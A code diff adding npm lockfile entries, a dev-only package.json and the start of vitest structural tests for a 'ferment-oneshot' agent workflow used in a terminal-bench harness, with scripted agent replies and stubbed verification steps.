+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"darwin"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/lightningcss-freebsd-x64": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-freebsd-x64/-/lightningcss-freebsd-x64-1.33.0.tgz",
+			"integrity": "sha512-QQM/Ti/hQajJwCY+RiWuCZ9sdtI/XQk7nDK5vC8kkdwixezOlDgvDx7+RT+QjK6FcFT4MpsuoBnHIo/O3StRRg==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"freebsd"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/lightningcss-linux-arm-gnueabihf": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-linux-arm-gnueabihf/-/lightningcss-linux-arm-gnueabihf-1.33.0.tgz",
+			"integrity": "sha512-N7FVBe6iS24MlM6R/4RBTxGhQheZGs7tiQ9U32UtF75NzP5Q7xWPRqLBCKxlRQRk3rY1jCIPLzx7WzOhuUIRLQ==",
+			"cpu": [
+				"arm"
+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/lightningcss-linux-arm64-gnu": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-linux-arm64-gnu/-/lightningcss-linux-arm64-gnu-1.33.0.tgz",
+			"integrity": "sha512-j2v/itmy4HlNxlc6voKXYgBqNi0Ng2LShg4z7GufpEgs05P+2suBVyi9I6YHq5uoVFx9ETin3eCEhLVyXGQnKg==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/lightningcss-linux-arm64-musl": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-linux-arm64-musl/-/lightningcss-linux-arm64-musl-1.33.0.tgz",
+			"integrity": "sha512-yiO5ROMuYQgXbC60yjZU5CYSFZGKXL0HFATXt9mHJn1+zW55oCtMI9NfcVhYLMFDL7gV7oBPon/EmMMGg2OvtQ==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/lightningcss-linux-x64-gnu": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-linux-x64-gnu/-/lightningcss-linux-x64-gnu-1.33.0.tgz",
+			"integrity": "sha512-ar+Ju7LmcN0Jo4FpL4hpFybwNG9/3A/Br5KW2n2jyODg3MEZXaDYADdemoNS+BDNfMgKvylJLj4S5tyRActuAg==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/lightningcss-linux-x64-musl": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-linux-x64-musl/-/lightningcss-linux-x64-musl-1.33.0.tgz",
+			"integrity": "sha512-RYiYbkokw0trfKqqzfF55lginwEPrD3OJDfTuJzFs1MK6iFnDenaz1fqLLtX4ITG3OktJQXOeTaw1awrBAlZPw==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/lightningcss-win32-arm64-msvc": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-win32-arm64-msvc/-/lightningcss-win32-arm64-msvc-1.33.0.tgz",
+			"integrity": "sha512-1K+MPfLSFVpphzpdbfkhlWk6wBrTObBzS2T6db10PNOZgR9GoVsAWzwNyuhUYYbTp23j+4RrncfujZ4uAzXvwA==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"win32"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/lightningcss-win32-x64-msvc": {
+			"version": "1.33.0",
+			"resolved": "https://registry.npmjs.org/lightningcss-win32-x64-msvc/-/lightningcss-win32-x64-msvc-1.33.0.tgz",
+			"integrity": "sha512-OlEICDx/Xl0FqSp4bry8zFnCvGpig3Gl4gCquvYwHuqJKEC1+n9NgDniFvqHGmMv1ZkqDJrDqKKSykTDX+ehuA==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MPL-2.0",
+			"optional": true,
+			"os": [
+				"win32"
+			],
+			"engines": {
+				"node": ">= 12.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/parcel"
+			}
+		},
+		"node_modules/magic-string": {
+			"version": "0.30.21",
+			"resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.21.tgz",
+			"integrity": "sha512-vd2F4YUyEXKGcLHoq+TEyCjxueSeHnFxyyjNp80yg0XV4vUhnDer/lvvlqM/arB5bXQN5K2/3oinyCRyx8T2CQ==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"@jridgewell/sourcemap-codec": "^1.5.5"
+			}
+		},
+		"node_modules/nanoid": {
+			"version": "3.3.16",
+			"resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.16.tgz",
+			"integrity": "sha512-bzlKTyNJ7+LdGIIwy8ijFpIqEQIvafahV7eYykJ8Cvh42EdJeODoJ6gUJXpQJvej1BddH8OqTXZNE/KfbWAu8Q==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/ai"
+				}
+			],
+			"license": "MIT",
+			"bin": {
+				"nanoid": "bin/nanoid.cjs"
+			},
+			"engines": {
+				"node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1"
+			}
+		},
+		"node_modules/obug": {
+			"version": "2.1.4",
+			"resolved": "https://registry.npmjs.org/obug/-/obug-2.1.4.tgz",
+			"integrity": "sha512-4a+OsYv9UktOJKE+l1A4OufDgdRF9PifWj+tJnHURo/P+WOxpG4GzUFL9qCalmWauao6ogiG+QvnCovwPoyAWA==",
+			"dev": true,
+			"funding": [
+				"https://github.com/sponsors/sxzz",
+				"https://opencollective.com/debug"
+			],
+			"license": "MIT",
+			"engines": {
+				"node": ">=12.20.0"
+			}
+		},
+		"node_modules/pathe": {
+			"version": "2.0.3",
+			"resolved": "https://registry.npmjs.org/pathe/-/pathe-2.0.3.tgz",
+			"integrity": "sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/picocolors": {
+			"version": "1.1.1",
+			"resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz",
+			"integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==",
+			"dev": true,
+			"license": "ISC"
+		},
+		"node_modules/picomatch": {
+			"version": "4.0.5",
+			"resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.5.tgz",
+			"integrity": "sha512-RvwwcruNjI1ncT5xRakeyS9Lf8lcItv34KD+aif+VH9kduAyfYBipGh12274xtenIPZ119/R9BdTBa8gAwSh0A==",
+			"dev": true,
+			"license": "MIT",
+			"engines": {
+				"node": ">=12"
+			},
+			"funding": {
+				"url": "https://github.com/sponsors/jonschlinkert"
+			}
+		},
+		"node_modules/postcss": {
+			"version": "8.5.25",
+			"resolved": "https://registry.npmjs.org/postcss/-/postcss-8.5.25.tgz",
+			"integrity": "sha512-DTPx3RWSSnWyzLxQnlH0rJP+EW5ekl16ZU4/psbIhA0e53kJfdgaN5vKM+xP7yJtXVu+nfdVFmlgFDEKAe4Pyw==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "opencollective",
+					"url": "https://opencollective.com/postcss/"
+				},
+				{
+					"type": "tidelift",
+					"url": "https://tidelift.com/funding/github/npm/postcss"
+				},
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/ai"
+				}
+			],
+			"license": "MIT",
+			"dependencies": {
+				"nanoid": "^3.3.16",
+				"picocolors": "^1.1.1",
+				"source-map-js": "^1.2.1"
+			},
+			"engines": {
+				"node": "^10 || ^12 || >=14"
+			}
+		},
+		"node_modules/rolldown": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/rolldown/-/rolldown-1.1.5.tgz",
+			"integrity": "sha512-t9z29cJjXf/vxQ8dyhCSpt6H6aSwHTk8cT5I3iy6SMXuFpk5mB6PL6XfC8PCwrPTx93udwKUm9HRteAlTGBLiA==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"@oxc-project/types": "=0.139.0",
+				"@rolldown/pluginutils": "^1.0.0"
+			},
+			"bin": {
+				"rolldown": "bin/cli.mjs"
+			},
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			},
+			"optionalDependencies": {
+				"@rolldown/binding-android-arm64": "1.1.5",
+				"@rolldown/binding-darwin-arm64": "1.1.5",
+				"@rolldown/binding-darwin-x64": "1.1.5",
+				"@rolldown/binding-freebsd-x64": "1.1.5",
+				"@rolldown/binding-linux-arm-gnueabihf": "1.1.5",
+				"@rolldown/binding-linux-arm64-gnu": "1.1.5",
+				"@rolldown/binding-linux-arm64-musl": "1.1.5",
+				"@rolldown/binding-linux-ppc64-gnu": "1.1.5",
+				"@rolldown/binding-linux-s390x-gnu": "1.1.5",
+				"@rolldown/binding-linux-x64-gnu": "1.1.5",
+				"@rolldown/binding-linux-x64-musl": "1.1.5",
+				"@rolldown/binding-openharmony-arm64": "1.1.5",
+				"@rolldown/binding-wasm32-wasi": "1.1.5",
+				"@rolldown/binding-win32-arm64-msvc": "1.1.5",
+				"@rolldown/binding-win32-x64-msvc": "1.1.5"
+			}
+		},
+		"node_modules/siginfo": {
+			"version": "2.0.0",
+			"resolved": "https://registry.npmjs.org/siginfo/-/siginfo-2.0.0.tgz",
+			"integrity": "sha512-ybx0WO1/8bSBLEWXZvEd7gMW3Sn3JFlW3TvX1nREbDLRNQNaeNN8WK0meBwPdAaOI7TtRRRJn/Es1zhrrCHu7g==",
+			"dev": true,
+			"license": "ISC"
+		},
+		"node_modules/source-map-js": {
+			"version": "1.2.1",
+			"resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz",
+			"integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"engines": {
+				"node": ">=0.10.0"
+			}
+		},
+		"node_modules/stackback": {
+			"version": "0.0.2",
+			"resolved": "https://registry.npmjs.org/stackback/-/stackback-0.0.2.tgz",
+			"integrity": "sha512-1XMJE5fQo1jGH6Y/7ebnwPOBEkIEnT4QF32d5R1+VXdXveM0IBMJt8zfaxX1P3QhVwrYe+576+jkANtSS2mBbw==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/std-env": {
+			"version": "4.2.0",
+			"resolved": "https://registry.npmjs.org/std-env/-/std-env-4.2.0.tgz",
+			"integrity": "sha512-oCUKSupKTHX53EyjDtuZQ64pjLJ6yYCtpmEw0goYxtjG9KpbRe8KAsl2tBUGU9DyMcJ0RwJ8GqJAFzMXcXW1Rw==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/tinybench": {
+			"version": "2.9.0",
+			"resolved": "https://registry.npmjs.org/tinybench/-/tinybench-2.9.0.tgz",
+			"integrity": "sha512-0+DUvqWMValLmha6lr4kD8iAMK1HzV0/aKnCtWb9v9641TnP/MFb7Pc2bxoxQjTXAErryXVgUOfv2YqNllqGeg==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/tinyexec": {
+			"version": "1.2.4",
+			"resolved": "https://registry.npmjs.org/tinyexec/-/tinyexec-1.2.4.tgz",
+			"integrity": "sha512-SHf/r48b7vOrjve9PxJo3MN5v5yuyjHvdUcrQffT3WXMUfnGmHDVbC4k3sHJaJTgZCwpUplIaAo5ANtMyp3YHg==",
+			"dev": true,
+			"license": "MIT",
+			"engines": {
+				"node": ">=18"
+			}
+		},
+		"node_modules/tinyglobby": {
+			"version": "0.2.17",
+			"resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.17.tgz",
+			"integrity": "sha512-wXR/dYpcqKmfWpEdZjiKJOwCNFndD0DMnrW/cYjVGttEkBfVgcLFHoNrlj47mjOVic9yyNu65alsgF4NQyTa2g==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"fdir": "^6.5.0",
+				"picomatch": "^4.0.4"
+			},
+			"engines": {
+				"node": ">=12.0.0"
+			},
+			"funding": {
+				"url": "https://github.com/sponsors/SuperchupuDev"
+			}
+		},
+		"node_modules/tinyrainbow": {
+			"version": "3.1.1",
+			"resolved": "https://registry.npmjs.org/tinyrainbow/-/tinyrainbow-3.1.1.tgz",
+			"integrity": "sha512-yau8yJdTt989Mm0Bd/236QnzEiPf2xLLTqUZRUJOo/3CB078LSwzei343DgtJVmfJKJE3TMINY1u42SQsP6mXw==",
+			"dev": true,
+			"license": "MIT",
+			"engines": {
+				"node": ">=14.0.0"
+			}
+		},
+		"node_modules/tslib": {
+			"version": "2.8.1",
+			"resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz",
+			"integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==",
+			"dev": true,
+			"license": "0BSD",
+			"optional": true
+		},
+		"node_modules/typebox": {
+			"version": "1.1.38",
+			"resolved": "https://registry.npmjs.org/typebox/-/typebox-1.1.38.tgz",
+			"integrity": "sha512-pZ0aQPmMmXoUvSbeuWf/Hzsc+avNw/Zd6VeE8CFgkVGWyuHPJvqeJJDeJqLve+K70LvjYIoleGcoJHPT17cWoA==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/typescript": {
+			"version": "7.0.2",
+			"resolved": "https://registry.npmjs.org/typescript/-/typescript-7.0.2.tgz",
+			"integrity": "sha512-8FYau96o3NKOhbjKi/qNvG/W5jhzxkbdm5sj9AbZ/5T5sWqn3hJgLfGx27sRKZWTvyzCP8dLRBTf5tBTSRVUNA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"bin": {
+				"tsc": "bin/tsc"
+			},
+			"engines": {
+				"node": ">=16.20.0"
+			},
+			"optionalDependencies": {
+				"@typescript/typescript-aix-ppc64": "7.0.2",
+				"@typescript/typescript-darwin-arm64": "7.0.2",
+				"@typescript/typescript-darwin-x64": "7.0.2",
+				"@typescript/typescript-freebsd-arm64": "7.0.2",
+				"@typescript/typescript-freebsd-x64": "7.0.2",
+				"@typescript/typescript-linux-arm": "7.0.2",
+				"@typescript/typescript-linux-arm64": "7.0.2",
+				"@typescript/typescript-linux-loong64": "7.0.2",
+				"@typescript/typescript-linux-mips64el": "7.0.2",
+				"@typescript/typescript-linux-ppc64": "7.0.2",
+				"@typescript/typescript-linux-riscv64": "7.0.2",
+				"@typescript/typescript-linux-s390x": "7.0.2",
+				"@typescript/typescript-linux-x64": "7.0.2",
+				"@typescript/typescript-netbsd-arm64": "7.0.2",
+				"@typescript/typescript-netbsd-x64": "7.0.2",
+				"@typescript/typescript-openbsd-arm64": "7.0.2",
+				"@typescript/typescript-openbsd-x64": "7.0.2",
+				"@typescript/typescript-sunos-x64": "7.0.2",
+				"@typescript/typescript-win32-arm64": "7.0.2",
+				"@typescript/typescript-win32-x64": "7.0.2"
+			}
+		},
+		"node_modules/undici-types": {
+			"version": "6.21.0",
+			"resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz",
+			"integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/vite": {
+			"version": "8.1.5",
+			"resolved": "https://registry.npmjs.org/vite/-/vite-8.1.5.tgz",
+			"integrity": "sha512-7ULLwsCdYx/nRyrpiEwvqb5TFHrMVZyBt+rg/OAXT7rgj/z+DtTDyKFeLAdDkubDVDKD8jOsndmy7m55XcfUsw==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"lightningcss": "^1.32.0",
+				"picomatch": "^4.0.5",
+				"postcss": "^8.5.17",
+				"rolldown": "~1.1.5",
+				"tinyglobby": "^0.2.17"
+			},
+			"bin": {
+				"vite": "bin/vite.js"
+			},
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			},
+			"funding": {
+				"url": "https://github.com/vitejs/vite?sponsor=1"
+			},
+			"optionalDependencies": {
+				"fsevents": "~2.3.3"
+			},
+			"peerDependencies": {
+				"@types/node": "^20.19.0 || >=22.12.0",
+				"@vitejs/devtools": "^0.3.0",
+				"esbuild": "^0.27.0 || ^0.28.0",
+				"jiti": ">=1.21.0",
+				"less": "^4.0.0",
+				"sass": "^1.70.0",
+				"sass-embedded": "^1.70.0",
+				"stylus": ">=0.54.8",
+				"sugarss": "^5.0.0",
+				"terser": "^5.16.0",
+				"tsx": "^4.8.1",
+				"yaml": "^2.4.2"
+			},
+			"peerDependenciesMeta": {
+				"@types/node": {
+					"optional": true
+				},
+				"@vitejs/devtools": {
+					"optional": true
+				},
+				"esbuild": {
+					"optional": true
+				},
+				"jiti": {
+					"optional": true
+				},
+				"less": {
+					"optional": true
+				},
+				"sass": {
+					"optional": true
+				},
+				"sass-embedded": {
+					"optional": true
+				},
+				"stylus": {
+					"optional": true
+				},
+				"sugarss": {
+					"optional": true
+				},
+				"terser": {
+					"optional": true
+				},
+				"tsx": {
+					"optional": true
+				},
+				"yaml": {
+					"optional": true
+				}
+			}
+		},
+		"node_modules/vitest": {
+			"version": "4.1.10",
+			"resolved": "https://registry.npmjs.org/vitest/-/vitest-4.1.10.tgz",
+			"integrity": "sha512-R9jUTe5S4Qb0HCd4TNqpC7oGcrMssMRGXLW80ubjWsW9VH5GF8y1Y0SFLY9AbqSk6nt0PnOx4H4WNJYZ13GUPw==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"@vitest/expect": "4.1.10",
+				"@vitest/mocker": "4.1.10",
+				"@vitest/pretty-format": "4.1.10",
+				"@vitest/runner": "4.1.10",
+				"@vitest/snapshot": "4.1.10",
+				"@vitest/spy": "4.1.10",
+				"@vitest/utils": "4.1.10",
+				"es-module-lexer": "^2.0.0",
+				"expect-type": "^1.3.0",
+				"magic-string": "^0.30.21",
+				"obug": "^2.1.1",
+				"pathe": "^2.0.3",
+				"picomatch": "^4.0.3",
+				"std-env": "^4.0.0-rc.1",
+				"tinybench": "^2.9.0",
+				"tinyexec": "^1.0.2",
+				"tinyglobby": "^0.2.15",
+				"tinyrainbow": "^3.1.0",
+				"vite": "^6.0.0 || ^7.0.0 || ^8.0.0",
+				"why-is-node-running": "^2.3.0"
+			},
+			"bin": {
+				"vitest": "vitest.mjs"
+			},
+			"engines": {
+				"node": "^20.0.0 || ^22.0.0 || >=24.0.0"
+			},
+			"funding": {
+				"url": "https://opencollective.com/vitest"
+			},
+			"peerDependencies": {
+				"@edge-runtime/vm": "*",
+				"@opentelemetry/api": "^1.9.0",
+				"@types/node": "^20.0.0 || ^22.0.0 || >=24.0.0",
+				"@vitest/browser-playwright": "4.1.10",
+				"@vitest/browser-preview": "4.1.10",
+				"@vitest/browser-webdriverio": "4.1.10",
+				"@vitest/coverage-istanbul": "4.1.10",
+				"@vitest/coverage-v8": "4.1.10",
+				"@vitest/ui": "4.1.10",
+				"happy-dom": "*",
+				"jsdom": "*",
+				"vite": "^6.0.0 || ^7.0.0 || ^8.0.0"
+			},
+			"peerDependenciesMeta": {
+				"@edge-runtime/vm": {
+					"optional": true
+				},
+				"@opentelemetry/api": {
+					"optional": true
+				},
+				"@types/node": {
+					"optional": true
+				},
+				"@vitest/browser-playwright": {
+					"optional": true
+				},
+				"@vitest/browser-preview": {
+					"optional": true
+				},
+				"@vitest/browser-webdriverio": {
+					"optional": true
+				},
+				"@vitest/coverage-istanbul": {
+					"optional": true
+				},
+				"@vitest/coverage-v8": {
+					"optional": true
+				},
+				"@vitest/ui": {
+					"optional": true
+				},
+				"happy-dom": {
+					"optional": true
+				},
+				"jsdom": {
+					"optional": true
+				},
+				"vite": {
+					"optional": false
+				}
+			}
+		},
+		"node_modules/why-is-node-running": {
+			"version": "2.3.0",
+			"resolved": "https://registry.npmjs.org/why-is-node-running/-/why-is-node-running-2.3.0.tgz",
+			"integrity": "sha512-hUrmaWBdVDcxvYqnyh09zunKzROWjbZTiNy8dBEjkS7ehEDQibXJ7XvlmtbwuTclUiIyN+CyXQD4Vmko8fNm8w==",
+			"dev": true,
+			"license": "MIT",
+			"dependencies": {
+				"siginfo": "^2.0.0",
+				"stackback": "0.0.2"
+			},
+			"bin": {
+				"why-is-node-running": "cli.js"
+			},
+			"engines": {
+				"node": ">=8"
+			}
+		}
+	}
+}

--- a/benchmark/terminal-bench-2/workflows/package.json
+++ b/benchmark/terminal-bench-2/workflows/package.json
@@ -1,0 +1,18 @@
+{
+	"//": "Dev-only. The container never installs this \u2014 the extension's jiti loader supplies a workflow's imports as virtual modules. It exists so these workflows get typechecking and tests. Keep the @kimchi-dev/kimchi-workflows pin equal to the EXTENSION default in scripts/run-workflow.sh: checking against a different engine version than the runs load proves nothing.",
+	"name": "@kimchi-dev/terminal-bench-workflows",
+	"private": true,
+	"version": "0.0.0",
+	"type": "module",
+	"scripts": {
+		"typecheck": "tsc --noEmit",
+		"test": "vitest run"
+	},
+	"devDependencies": {
+		"@kimchi-dev/kimchi-workflows": "0.0.1-alpha.1",
+		"@types/node": "^22.10.0",
+		"typebox": "1.1.38",
+		"typescript": "^7.0.2",
+		"vitest": "^4.1.10"
+	}
+}

--- a/benchmark/terminal-bench-2/workflows/test/ferment-oneshot.test.ts
+++ b/benchmark/terminal-bench-2/workflows/test/ferment-oneshot.test.ts
@@ -1,0 +1,1181 @@
+import { execFileSync } from "node:child_process"
+import { mkdtempSync, rmSync, writeFileSync } from "node:fs"
+import { tmpdir } from "node:os"
+import { join } from "node:path"
+import { afterEach, beforeEach, describe, expect, it } from "vitest"
+import fermentOneshot from "../ferment-oneshot.workflow.ts"
+import { currentGitRef, phaseDiffSince, runVerification } from "../ferment/verify.ts"
+import { type AgentStep, forEachNode } from "@kimchi-dev/kimchi-workflows"
+import { createTestRun, reply, throws } from "@kimchi-dev/kimchi-workflows/testing"
+
+/**
+ * Structural tests for the one-shot ferment solver (`ferment-oneshot.workflow.ts`, this directory —
+ * ported here from kimchi-workflows' `test/ferment-oneshot.test.ts` when the workflow itself moved out
+ * of that repo), with every agent step scripted and the verification command stubbed — so this pins the
+ * WIRING (which stage reads whose output, when a step is re-entered, what the judge is asked) without a
+ * model or a container.
+ *
+ * The thing most worth pinning is the SHAPE of the port: this workflow claims to be kimchi's one-shot
+ * ferment minus its nudges, so the tests check both halves of that claim — the ferment's instruction
+ * text is present, and its continuation machinery is not.
+ *
+ * The load-bearing claim as of now: **a step is ONE agent turn that does the work and then answers for
+ * it, and no worker is ever dispatched.** kimchi's one-shot orchestrator executes steps directly (31 of
+ * 31 `complete_ferment_step` calls across six live runs omit `worker_agent_id`), so a flag is refused
+ * back into the session that raised it, which may work some more and answer again.
+ */
+
+const gates = (ids: readonly string[], verdict = "pass") =>
+	ids.map((id) => ({ id, verdict, rationale: `${id} holds`, evidence: "n/a" }))
+
+const plan = {
+	title: "Print ok from cli",
+	goal: "Make the cli print ok",
+	success_criteria: ["running the cli prints ok and exits 0"],
+	constraints: [],
+	phases: [
+		{
+			name: "Fix the cli",
+			goal: "the cli prints ok",
+			steps: [
+				{ description: "patch main.py so it prints ok", verify: "python /app/main.py", budget_tier: "standard" },
+				{ description: "remove the debug line", verify: "! grep -q DEBUG /app/main.py", budget_tier: "narrow" },
+			],
+		},
+	],
+	questions: [],
+	gates: gates(["P1", "P2", "P3"]),
+}
+
+const onePhaseOneStep = {
+	...plan,
+	phases: [
+		{
+			name: "Fix the cli",
+			goal: "the cli prints ok",
+			steps: [{ description: "patch main.py so it prints ok", verify: "python /app/main.py" }],
+		},
+	],
+}
+
+/** What a step turn returns: the summary the next steps read, and its own verdicts on its own work. */
+const stepPass = { summary: "main.py now prints ok", gates: gates(["S1", "S2", "S3"]) }
+const stepFlagged = {
+	summary: "claims a file it never touched",
+	gates: [
+		{
+			id: "S1",
+			verdict: "flag",
+			rationale: "the summary names src/other.py, which is not in the diff",
+			evidence: "git diff shows only /app/main.py",
+		},
+		{ id: "S2", verdict: "pass", rationale: "smoke: runs the cli", evidence: "python /app/main.py" },
+		{ id: "S3", verdict: "pass", rationale: "empty input handled", evidence: "returns early" },
+	],
+}
+const phasePass = { summary: "the cli prints ok", gates: gates(["F1", "F2", "F3"]) }
+/** kimchi's phase grader: A/B advance, C/D/F refuse and buy a rework. */
+const gradeA = { grade: "A", rationale: "the phase goal is met and the diff shows it", recommendations: [] }
+const gradeC = {
+	grade: "C",
+	rationale: "the merge is there but the conflict markers were never checked",
+	recommendations: ["grep the working tree for conflict markers and remove any that remain"],
+}
+const shipPass = { summary: "delivered", gates: gates(["C1", "C2", "C3"]) }
+/** The phase rework is the one turn still handed to an agent of its own, and it reports like a worker. */
+const reworked = {
+	status: "completed",
+	summary: "removed the conflict markers",
+	steps_completed: ["grepped the tree", "removed two markers"],
+	remaining_steps: [],
+}
+
+/** A verification that exits 0, standing in for the real `bash -lc` run. */
+const verifyOk = () => ({ ran: true, command: "python /app/main.py", exitCode: 0, stdout: "ok\n", stderr: "" })
+const verifyFail = () => ({
+	ran: true,
+	command: "python /app/main.py",
+	exitCode: 1,
+	stdout: "",
+	stderr: "SyntaxError: stray paren",
+})
+
+/** The git steps shell out; stub them so the suite stays hermetic. */
+const noGit = {
+	"phase-start-ref": () => ({ ref: "abc123" }),
+	"phase-diff": () => ({
+		available: true,
+		filesChanged: " _includes/about.md | 2 +-",
+		diffSnippet: "@@ -1 +1 @@",
+		elidedBytes: 0,
+	}),
+	"step-start-ref": () => ({ ref: "abc123" }),
+}
+
+/**
+ * kimchi's `taskInputSchema` here is `Type.Object({ instruction: Type.String() })` — `deadlineIso` was
+ * dropped when this workflow moved out of kimchi-workflows, because the harbor adapter's envelope is
+ * exactly `{"instruction": ...}` and the extension validates input against this schema before a run
+ * starts (`ferment/contract.ts`'s header). Named `roomyInput` from when it also carried a generous
+ * deadline; kept as a function, and kept named, so every call site below reads as "input that leaves
+ * this run room to work" rather than a bare literal repeated 30-odd times.
+ */
+const roomyInput = () => ({
+	instruction: "Make the cli print ok.",
+})
+
+function agentSteps(): Map<string, AgentStep> {
+	const steps = new Map<string, AgentStep>()
+	forEachNode(fermentOneshot.nodes, (node) => {
+		if (node.kind === "step" && node.step.kind === "agent") steps.set(node.step.name, node.step)
+	})
+	return steps
+}
+
+describe("ferment-oneshot: the lifecycle", () => {
+	it("runs plan → phase → steps → gates → ship when nothing objects", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(plan)],
+				"step-turn": [reply(stepPass), reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		if (run.status !== "completed") throw new Error(`${run.status} @ ${run.path} :: ${run.error}`)
+		expect(run.output).toEqual({ shipped: true, phases: 1, steps: 2, stepsDone: 2 })
+		// One turn per step, and nothing else ran: the step turn IS the work.
+		expect(run.agent("step-turn").sessions).toBe(2)
+		expect(run.agent("judge").sessions).toBe(0) // the plan asked nothing
+		expect(run.agent("refine-steps").sessions).toBe(0) // the plan already had steps
+		expect(run.agent("verify-judge").sessions).toBe(0) // verification passed, so nothing to triage
+	})
+
+	it("refuses a flagged completion straight back into the same session, and dispatches nobody", async () => {
+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepFlagged), reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
